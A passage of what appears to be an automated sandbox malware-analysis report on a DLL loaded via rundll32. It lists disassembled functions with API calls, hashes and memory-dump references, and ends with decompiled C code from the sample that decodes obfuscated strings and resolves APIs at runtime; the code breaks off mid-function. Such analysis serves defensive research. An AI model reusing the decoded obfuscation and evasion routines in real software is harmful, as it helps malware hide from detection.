                                                      • Opcode Fuzzy Hash: cb4071320cc1499e5a5c1304804e1570699d05f0dfaa905e643ba1de8538af2c
                                                      • Instruction Fuzzy Hash: 26F04932910605EFDB10EFB8CA49B9D37E5EB15324F108555F508DB3A4DB388A41DF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E8067AF, Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F7D21: GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D58
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                        • Part of subcall function 6E7F7D21: _abort.LIBCMT ref: 6E7F7D9F
                                                      • EnumSystemLocalesW.KERNEL32(6E806706,00000001,?,?,?,6E806F8F,6E7F86F8,?,?,?,?,?,6E7F86F8,?,?,?), ref: 6E8067E6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID:
                                                      • API String ID: 1084509184-0
                                                      • Opcode ID: ab0a272ffa8317559eedd6734b01bf870eb9397e2a4ab1cda0b8b4ccc3982199
                                                      • Instruction ID: 37d6993bf5b5e79ea4558bb5e30c787767804fd1f7c6660d17e8a33ea65077c5
                                                      • Opcode Fuzzy Hash: ab0a272ffa8317559eedd6734b01bf870eb9397e2a4ab1cda0b8b4ccc3982199
                                                      • Instruction Fuzzy Hash: 97F0AB3A31020997CB059FB9DD04AAA7FA4EFC1720B06445CEE0ACBB80D2329883D790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FBFFF, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnumSystemLocalesW.KERNEL32(Function_0006AECC,00000001), ref: 6E7FC019
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2099609381-0
                                                      • Opcode ID: c6d5bbc93fbda16fe427a009bbb5479537f9c884a7568178eb3a05f0218bd7ff
                                                      • Instruction ID: af2a798223929126a052816890502884b22ee0462bfe0cd85154bb7fd26921e0
                                                      • Opcode Fuzzy Hash: c6d5bbc93fbda16fe427a009bbb5479537f9c884a7568178eb3a05f0218bd7ff
                                                      • Instruction Fuzzy Hash: 99E08C72550701ABEF29DFA6DA49A453B67E3C1320F10C165FA080E68CCA715982D6C0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E803336, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileExA.KERNEL32(?,?,?,?,?,?), ref: 6E803359
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: f1699d674b95fc483bad0b23b2f49fb2acef16a2a58b544b1d05729a723ccdab
                                                      • Instruction ID: b7428732d4e6335568ba7864a078cbbba3f672907568e5be0b8b9976de013559
                                                      • Opcode Fuzzy Hash: f1699d674b95fc483bad0b23b2f49fb2acef16a2a58b544b1d05729a723ccdab
                                                      • Instruction Fuzzy Hash: 6BE07E3A100649EF8F01DF89D845C997BA6FB4E750B144090FA199B631C772E961EB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E803361, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileExW.KERNEL32(?,?,?,?,?,?), ref: 6E803384
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: f2254fbdc91585c66efb29ce37baceaaf83aa8cde48fc0f05af11144405bdd60
                                                      • Instruction ID: 82a6e83cb8dfae92780933c45c07a210b22c612ad27a4ebae0c563d5a3a41b82
                                                      • Opcode Fuzzy Hash: f2254fbdc91585c66efb29ce37baceaaf83aa8cde48fc0f05af11144405bdd60
                                                      • Instruction Fuzzy Hash: 93E07E3A100649EF8F01DF89D845C993BA6FB4E750B444090FA198B630C736E961EB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E5DC3, Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 2abc78a42e96b9f76614508b66b26d49ae7e105bc553f3eeb3402863afc69426
                                                      • Instruction ID: 9ac6dbead913457c94b5a673afff91bd03f94cf1f3f4c50cd945722ca57d2d79
                                                      • Opcode Fuzzy Hash: 2abc78a42e96b9f76614508b66b26d49ae7e105bc553f3eeb3402863afc69426
                                                      • Instruction Fuzzy Hash: 05516B7121878F5BDBA889E8A7647EF739D9B02308F040D79D951CFDB1D705D9018BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E595A, Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: b1c57ed7dfcee195fde5581c9a7ac82f6180794eb74b08ea891275fcea491c32
                                                      • Instruction ID: 442a529c064d6a3656080f25b47f14ddf361b07756e6001f23f16e5c7693e053
                                                      • Opcode Fuzzy Hash: b1c57ed7dfcee195fde5581c9a7ac82f6180794eb74b08ea891275fcea491c32
                                                      • Instruction Fuzzy Hash: B251A06061474E4BDB90CDE8A7E57EF3B999B42318F040939C882EBEB2D705D5418B66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E5B94, Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 41bf8402236082b07f830b5790f9d3d34b441cc2bac2b08159400846b8cb7e1a
                                                      • Instruction ID: ccbe894c484193b85bbf820135b8bd749345c698bd8357a19e47a2274ac2845d
                                                      • Opcode Fuzzy Hash: 41bf8402236082b07f830b5790f9d3d34b441cc2bac2b08159400846b8cb7e1a
                                                      • Instruction Fuzzy Hash: 9D517D2021864F5BDB908AE8ABB67EE33AE9B02304F140939D952CBEF1C705D945CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E572B, Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 670da4a54fb7dd0b4e5848513550c67a5b25786297471f5278ce15c4382943c0
                                                      • Instruction ID: 5cf6b79ac6fd18ffa3c2553128c4a6d5617a05c2eb753155d4a9f69ec889820d
                                                      • Opcode Fuzzy Hash: 670da4a54fb7dd0b4e5848513550c67a5b25786297471f5278ce15c4382943c0
                                                      • Instruction Fuzzy Hash: 77518B6160470EDBDBA089E8BB657EE33DDBB03348F000A39D991CBEB1C715E5158B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F3FDF, Relevance: .7, Instructions: 669COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: e669b753b5a3df7172dc7d11b2f69c874dc9069427752a20496233860aab787b
                                                      • Instruction ID: a4786994f8ff6a4e3919fe980fdf1a0996a6c1109556d850883a983711ed7b38
                                                      • Opcode Fuzzy Hash: e669b753b5a3df7172dc7d11b2f69c874dc9069427752a20496233860aab787b
                                                      • Instruction Fuzzy Hash: F532A174A1410ADFCB04CF98CA94AEEB7B5FF45308F244168D941A7329EB31AA57DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7ED5DE, Relevance: .5, Instructions: 471COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f8a66d8a6c92f8afbb2bafbdc91d99026e52f45a7aae1e14620a6d7f7280614
                                                      • Instruction ID: e0b678aa2d2abc6e38cc86e4ed29fd97c5b39f81a666589d6690e17252e0cbcb
                                                      • Opcode Fuzzy Hash: 7f8a66d8a6c92f8afbb2bafbdc91d99026e52f45a7aae1e14620a6d7f7280614
                                                      • Instruction Fuzzy Hash: 02027171A042258FDB65CFA8CD8079AB7F9EF85304F0440EADA49EB658E7709E418F45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F0C10, Relevance: .4, Instructions: 410COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 832ecd5a5b6b9a92bc5171e8c91c03431aa77d1cf93ec4fc9d5e1ecc42e63b65
                                                      • Instruction ID: d16b6195936fe806c35fbbc00aa0f8b0fb3b2990bc99f5f40adbae560f4320b5
                                                      • Opcode Fuzzy Hash: 832ecd5a5b6b9a92bc5171e8c91c03431aa77d1cf93ec4fc9d5e1ecc42e63b65
                                                      • Instruction Fuzzy Hash: 1DF1ADB1A0021ADFDB25DF98DA90BDAB3B9FF45304F1400AAD849A7355E7709E46CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E79C2D0, Relevance: .4, Instructions: 351COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b811418bbd8d080b518c849b9a0a3709243f1570c6365fc3985be06224d00b8
                                                      • Instruction ID: 44a83b4d9eea39fb59c2d4ce02628f0cf026782368951de6525704ebc3795dae
                                                      • Opcode Fuzzy Hash: 4b811418bbd8d080b518c849b9a0a3709243f1570c6365fc3985be06224d00b8
                                                      • Instruction Fuzzy Hash: B5D1B171D00209ABDF04CFA8ED44BEEBBB9FF49314F004629F814AB2A0D735A951DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F0760, Relevance: .3, Instructions: 292COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 603026d4a2b25c2d82eed992d36a7eb26308d5fa814b1655418303da56eef23c
                                                      • Instruction ID: 9397f21602b41a4d5f5a8943cd2f9c6133f0fd0bba1a197f6fd18b12a5b889e0
                                                      • Opcode Fuzzy Hash: 603026d4a2b25c2d82eed992d36a7eb26308d5fa814b1655418303da56eef23c
                                                      • Instruction Fuzzy Hash: 8CB15A71A00229DBDB21CE58D990BEDB7B5EF89304F1441EAD809AB355E7719E428F90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E6723, Relevance: .2, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6dd5245bdb9066fd6e70a7ab90f020ce122757fcece878e1e8e550a2566ae41d
                                                      • Instruction ID: dd04f857cdd1b183d7647b32993f0f95b33a8209ba0fd8cad2dfb2d4374a1944
                                                      • Opcode Fuzzy Hash: 6dd5245bdb9066fd6e70a7ab90f020ce122757fcece878e1e8e550a2566ae41d
                                                      • Instruction Fuzzy Hash: B2615A3167070A56DA544DE88B64BEE33A8DB42748F00083DD763DFDB1D711EB428B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E625A, Relevance: .2, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b1dff6b1165f65f83d793e357fa5c03870c4c30c711576ccafb33843f2fecca
                                                      • Instruction ID: 41c29a9990d7bcf887ff5b7770ea9c5ee8efdf23ffc41e730f255e961d2a6723
                                                      • Opcode Fuzzy Hash: 2b1dff6b1165f65f83d793e357fa5c03870c4c30c711576ccafb33843f2fecca
                                                      • Instruction Fuzzy Hash: D461377167070A56DA508AE88BA0BAE339DDB06308F00097DEB51DBEF1D615DB42CA95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E5FFD, Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c38eb7a5ab92edf08c1b7e494025a5800465a9476d497f43743e76e636197857
                                                      • Instruction ID: 2f2b9f4e9206e3b1657cea057e1ac3af2d516d738830394d43caf42eb9d5aea8
                                                      • Opcode Fuzzy Hash: c38eb7a5ab92edf08c1b7e494025a5800465a9476d497f43743e76e636197857
                                                      • Instruction Fuzzy Hash: B9618B71270616DADAA149E89B64FFE33989B02708F000939DB52DBDF6D722DB428B11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E64C6, Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbfb10f8b9e9109bc91f33e9d0e8d2b346c1eb951e9ec24ba159889e257c22a9
                                                      • Instruction ID: 8d8b8d613d74d6589d42f446a5335c6640ef426a5e296eb348ade9b35408eb5d
                                                      • Opcode Fuzzy Hash: dbfb10f8b9e9109bc91f33e9d0e8d2b346c1eb951e9ec24ba159889e257c22a9
                                                      • Instruction Fuzzy Hash: AD618BB177070A5ADA504AE85B647EE33A9EB06708F000839DB52DFDFDE711DB429B05
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7A8A70, Relevance: .2, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a874409891eb73d2a32f5f4cca1cb263eb671774219eed3ebaeeb01f58fc7765
                                                      • Instruction ID: d0c44e55da392ea30553cd47bcb618fec873087b2a96dbd5c775c2a9c4e0a729
                                                      • Opcode Fuzzy Hash: a874409891eb73d2a32f5f4cca1cb263eb671774219eed3ebaeeb01f58fc7765
                                                      • Instruction Fuzzy Hash: 1D51F4B270429A8FE704CE9CCA9826973A1FB84340F45433DEB11DB264D670E915CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7D83F0, Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: 64b8f32f41a72b7add2b54770a59aa5b235d3c0dcc7df58f36d19b749cad9c15
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: A7115B7724008343F282CDEDD6B47ABA3A5EBC622476DA37AC0614B678C523A04F9E00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77F248, Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77F248(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6E77D818(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                                      0x6e77f255
                                                      0x6e77f257
                                                      0x6e77f25a
                                                      0x6e77f25d
                                                      0x6e77f260
                                                      0x6e77f271
                                                      0x6e77f273
                                                      0x6e77f262
                                                      0x6e77f266
                                                      0x6e77f26f
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f26f
                                                      0x6e77f278

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c52ac8965748102b5d618a5f85baad1e03bdce1bee5af2d666f91b71e1d64f
                                                      • Instruction ID: 8960b008a9200b35907c3f4cd486daa5d9d737844c351850a206afc1333d574e
                                                      • Opcode Fuzzy Hash: a2c52ac8965748102b5d618a5f85baad1e03bdce1bee5af2d666f91b71e1d64f
                                                      • Instruction Fuzzy Hash: 70E08632911228EBCF24CFC8C604989B3FCEB45A10B114556F611D3120C270DE00CBD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77268B, Relevance: 162.4, APIs: 18, Strings: 90, Instructions: 364memorystringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E6E77268B(long __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, long* _a16) {
				signed int _v8;
				short _v36;
				short _v72;
				long _v76;
				char _v80;
				signed int _v84;
				long _v88;
				void* _v92;
				void* _v96;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				short _v124;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				short _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				long _v220;
				intOrPtr _v224;
				intOrPtr* _v228;
				long* _v232;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t215;
				void* _t243;
				void* _t244;
				void* _t246;
				intOrPtr* _t247;
				void* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t254;
				void* _t256;
				intOrPtr* _t257;
				signed int _t258;
				void* _t261;
				void* _t270;
				void* _t274;
				signed int _t283;
				signed int _t290;
				intOrPtr _t293;
				long _t295;
				void* _t298;
				void* _t312;
				long _t313;
				long _t317;
				signed int _t321;
				void* _t323;
				void* _t324;
				void* _t325;
				signed int _t326;

				_t295 = __ecx;
				_t215 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t215 ^ _t326;
				_t317 = __ecx;
				_v224 = _a4;
				_t292 = 0;
				_v228 = _a12;
				_v220 = __ecx;
				_v232 = _a16;
				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					_v124 = 0x34;
					_v123 = 0x4d;
					_v122 = 0x5b;
					_v121 = 0x4d;
					_v120 = 0x4a;
					_v119 = 0x4d;
					_v118 = 0x25;
					_v117 = 0x4d;
					_v116 = 0x49;
					_v115 = 0x4d;
					_v114 = 0x15;
					_v113 = 0x4d;
					_v112 = 0x6a;
					_v111 = 0x4d;
					_v110 = 0x25;
					_v109 = 0x4d;
					_v108 = 2;
					_v107 = 0x4d;
					_v106 = 1;
					_v105 = 0x4d;
					_v104 = 0x15;
					_v103 = 0x4d;
					_v102 = 0x6e;
					_v101 = 0x4d;
					_v100 = 0x4d;
					_v99 = 0x4d;
					_v98 = 0;
					_t322 = 0x7f;
					if(_v98 == 0) {
						_t313 = 0;
						do {
							asm("cdq");
							_t290 = _t322 + (( *(_t326 + _t313 - 0x78) & 0x000000ff) - 0x4d) * 7 % _t322;
							asm("cdq");
							_t314 = _t290 % _t322;
							 *(_t326 + _t313 - 0x78) = _t290 % _t322;
							_t313 = _t313 + 1;
						} while (_t313 < 0x1a);
						_v98 = 1;
					}
					lstrcpyW( &_v36,  &_v124);
					_push(_t295);
					_v88 = _t292;
					_v76 = _t292;
					_t61 = E6E77111C() + 0x18; // 0x18
					_t298 = _t61;
					if(E6E771D91(_t298, _t317,  *((intOrPtr*)(_t317 + 4)),  &_v36,  &_v88, _t295,  &_v76) != 0) {
						goto L14;
					} else {
						_t292 = GetProcessHeap;
						_t322 = HeapAlloc(GetProcessHeap(), GetProcessHeap, _v88);
						_v96 = _t322;
						if(_t322 == 0) {
							goto L14;
						} else {
							_v160 = 0x5a;
							_v159 = 0x3a;
							_v158 = 0x57;
							_v157 = 0x3a;
							_v156 = 0x5f;
							_v155 = 0x3a;
							_v154 = 0x4c;
							_v153 = 0x3a;
							_v152 = 0x3c;
							_v151 = 0x3a;
							_v150 = 0x14;
							_v149 = 0x3a;
							_v148 = 5;
							_v147 = 0x3a;
							_v146 = 0x75;
							_v145 = 0x3a;
							_v144 = 0x5f;
							_v143 = 0x3a;
							_v142 = 0x27;
							_v141 = 0x3a;
							_v140 = 0x78;
							_v139 = 0x3a;
							_v138 = 0x75;
							_v137 = 0x3a;
							_v136 = 0x79;
							_v135 = 0x3a;
							_v134 = 5;
							_v133 = 0x3a;
							_v132 = 0x27;
							_v131 = 0x3a;
							_v130 = 0x4c;
							_v129 = 0x3a;
							_v128 = 0x3a;
							_v127 = 0x3a;
							_v126 = 0;
							if(_v126 == 0) {
								_t312 = 0;
								_t321 = 0x7f;
								do {
									asm("cdq");
									_t283 = _t321 + (( *(_t326 + _t312 - 0x9c) & 0x000000ff) - 0x3a) * 0x22 % _t321;
									asm("cdq");
									_t314 = _t283 % _t321;
									 *(_t326 + _t312 - 0x9c) = _t283 % _t321;
									_t312 = _t312 + 1;
								} while (_t312 < 0x22);
								_t317 = _v220;
								_v126 = 1;
							}
							lstrcpyW( &_v72,  &_v160);
							_v84 = _v84 & 0x00000000;
							_push(_t298);
							_t124 = E6E77111C() + 0x18; // 0x18
							if(E6E771D91(_t124, _t317,  *((intOrPtr*)(_t317 + 4)),  &_v72,  &_v84, _t298,  &_v76) == 0) {
								_t317 = 0;
								_t243 = HeapAlloc(GetProcessHeap(), 0, _v84);
								_v92 = _t243;
								if(_t243 != 0) {
									_t293 = _v220;
									_v80 = 0;
									_t292 =  *(_t293 + 4);
									_t244 = E6E77111C();
									_v196 = 0x2d;
									_v195 = 0x74;
									_t323 = _t244;
									_v194 = 0x18;
									_v193 = 0xd;
									_v192 = 9;
									_v191 = 0x27;
									_v190 = 0x74;
									_v189 = 0x18;
									_v188 = 0x75;
									_v187 = 0x57;
									_v186 = 0x27;
									_v185 = 0x75;
									_v184 = 0x5a;
									_v183 = 0x57;
									_v182 = 0x5f;
									_v181 = 0x4c;
									_v180 = 0x3a;
									_v179 = 0;
									_t246 = E6E7721A1( &_v196);
									_t152 = _t323 + 0x18; // 0x18
									_t247 = E6E77657F(_t152, _t246);
									_push(0);
									_push(0);
									_push(0);
									_push(_v88);
									_push(_v96);
									_push( &_v80);
									_push( *(_t293 + 4));
									if( *_t247() == 0) {
										_t319 = _v80;
										_t249 = E6E77111C();
										_v176 = 0x4f;
										_v175 = 0x7e;
										_t324 = _t249;
										_v174 = 0x31;
										_t292 = 0;
										_v173 = 0x7c;
										_v172 = 0x52;
										_v171 = 0x10;
										_v170 = 0x6b;
										_v169 = 0xc;
										_v168 = 0x60;
										_v167 = 0x57;
										_v166 = 0x2e;
